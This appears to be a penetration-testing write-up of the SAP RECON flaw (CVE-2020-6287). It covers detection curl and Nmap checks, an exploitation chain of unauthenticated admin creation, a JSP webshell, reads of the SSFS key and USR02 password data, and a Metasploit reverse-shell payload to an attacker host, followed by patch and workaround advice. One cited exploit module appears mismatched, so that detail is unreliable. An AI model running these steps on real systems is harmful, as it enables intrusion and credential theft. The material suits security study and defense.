SAP RECON — CVE-2020-6287
CVE-2020-6287 — dubbed RECON (Remotely Exploitable Code On NetWeaver) — is a CVSS 10.0 pre-auth RCE in SAP NetWeaver Application Server Java. Discovered by Onapsis in 2020. No credentials required. Affects 40,000+ SAP customers worldwide.
Vulnerability Summary
| Field | Detail |
|---|---|
| CVE | CVE-2020-6287 (related: CVE-2020-6286) |
| CVSS Score | 10.0 (Critical) |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Affected Component | SAP NetWeaver AS Java — LM Configuration Wizard |
| Affected Versions | NetWeaver AS Java 7.30, 7.31, 7.40, 7.50 |
| Auth Required | None |
| Network Access | HTTP/HTTPS — internet-facing by default |
| Patch | SAP Security Note #2934135 (July 2020) |
| Discovered By | Onapsis Research Labs |
How It Works
The LM Configuration Wizard (tc~lm~ctc~cul~startup_app) exposes a SOAP endpoint (CTCWebService) that performs administrative tasks. The endpoint requires no authentication by design — intended only for initial system setup, but left active in production deployments.
An attacker can:
- Call the unauthenticated
CTCWebServiceSOAP endpoint - Create a new high-privilege SAP user (or reset
SAP*) - Use the created user to authenticate as admin
- Deploy arbitrary content (JSP webshells, payloads) via the Java application server
- Execute OS commands with
<sid>admprivileges
Additionally, CVE-2020-6286 (path traversal, CVSS 5.3) allows downloading ZIP files to arbitrary directories without authentication — often chained with CVE-2020-6287 for file placement before code execution.
The endpoint targeted is:
/developmentserver/metadatauploader
Detection — Is the Target Vulnerable?
Step 1: Check If LM Config Wizard Is Exposed
# Check for the vulnerable endpoint (no auth)
curl -s -o /dev/null -w "%{http_code}" \
http://<target>:50000/developmentserver/metadatauploader
# 200 or non-404 = endpoint is accessible
# Also check the SOAP endpoint directly
curl http://<target>:50000/ctc/
curl http://<target>:50000/webdynpro/resources/sap.com/tc~lm~ctc~cul~startup_app/
# If the application returns the wizard or a SOAP WSDL — likely vulnerable
curl http://<target>:50000/webdynpro/dispatcher/sap.com/tc~lm~ctc~cul~startup_app/LMConfigWizard
Step 2: Confirm Version
# Check SAP version via ICM header
curl -I http://<target>:50000/irj/portal
# Response headers: server: SAP NetWeaver Application Server 7.xx
# Or via Nmap
nmap -sV -p 50000 <target>
Step 3: Metasploit Module
msf > use auxiliary/scanner/sap/sap_recon
msf > set RHOSTS <target>
msf > set RPORT 50000
msf > run
# Module checks for:
# - Endpoint accessibility
# - SAP version fingerprint
# - LM Configuration Wizard presence
Exploitation Chain
Phase 1: Create Admin User via Unauthenticated SOAP Call
The CTCWebService accepts SOAP requests to perform user management tasks. The attack crafts a SOAP message to the CreateUser or equivalent administrative action.
POST /CTCWebService/CTCWebServiceBean HTTP/1.1
Host: <target>:50000
Content-Type: text/xml; charset=utf-8
SOAPAction: "createUser"
[SOAP envelope with admin user creation payload]
Tools that automate this:
- Metasploit module
exploit/multi/sap/sap_managementconsole_uddi - PoC scripts published by Dmitry Chastuhin and Onapsis (GitHub)
- redrays.io automated scanner
Phase 2: Log In as Created Admin User
# Use the newly created SAP admin user to authenticate
# Access the SAP Java admin console
curl -u <new_admin>:<pass> http://<target>:50000/irj/portal
# Or via SAP NetWeaver Admin console
curl -u <new_admin>:<pass> http://<target>:50013/nwa/
Phase 3: Deploy a JSP Webshell
Once authenticated as an admin user, deploy a JSP page to the SAP application server:
Target path: ../apps/sap.com/irj/servlet_jsp/irj/root/<random>.jsp
Access URL: http://<target>:50000/irj/<random>.jsp?cmd=<os_command>
The file upload uses the Java application deployment mechanism. After deployment:
# Execute OS commands via the webshell
curl "http://<target>:50000/irj/<shell>.jsp?cmd=id"
curl "http://<target>:50000/irj/<shell>.jsp?cmd=whoami"
# The process runs as <SID>adm — SAP service account with full DB access
Phase 4: Lateral Movement
The <SID>adm account has:
- Full access to the SAP HANA or backend database
- Ability to stop/start all SAP services
- Access to configuration files, transport directories, and system keys
# Access HANA DB as <SID>adm
hdbsql -n localhost -U DEFAULT "SELECT * FROM USR02"
# Read SAP system keys / RFC gateway config
cat /usr/sap/<SID>/SYS/global/security/rsecssfs/data/SSFS_<SID>.DAT
Metasploit Modules
# Detection/scanner
msf > use auxiliary/scanner/sap/sap_recon
msf > set RHOSTS <target>
msf > set RPORT 50000
msf > run
# If confirmed vulnerable — create admin user
msf > use exploit/multi/sap/sap_managementconsole_uddi
msf > set RHOSTS <target>
msf > set RPORT 50000
msf > set PAYLOAD java/meterpreter/reverse_tcp
msf > set LHOST <attacker>
msf > set LPORT 4444
msf > run
Mitigation
Primary fix: Apply SAP Security Note #2934135.
Temporary workaround (if patching is not immediately possible):
- Disable the LM Configuration Wizard application:
- In SAP NetWeaver Administrator → Applications →
tc~lm~ctc~cul~startup_app - Set deployment status to Stopped
- In SAP NetWeaver Administrator → Applications →
- Block external access to port
50000/50013at the network level - Enable WAF rule to block requests to
/developmentserver/and/ctc/
Verification after patch:
# Should return 404 after patch/disable
curl http://<target>:50000/developmentserver/metadatauploader
Related CVEs
| CVE | Description | CVSS |
|---|---|---|
| CVE-2020-6286 | SAP NetWeaver Java path traversal (unauthenticated ZIP download) | 5.3 |
| CVE-2020-6207 | SAP Solution Manager EEM missing authentication — unauthenticated RCE | 10.0 |
| CVE-2022-22536 | SAP ICM HTTP request smuggling — session theft, ABAP+Java | 10.0 |
References
- Onapsis Advisory: ONAPSIS-2021-0003
- CISA Advisory: AA20-195A
- SAP Security Note: #2934135
- CISA KEV: Listed
- Active exploitation confirmed by Onapsis and CISA post-PoC publication (2021)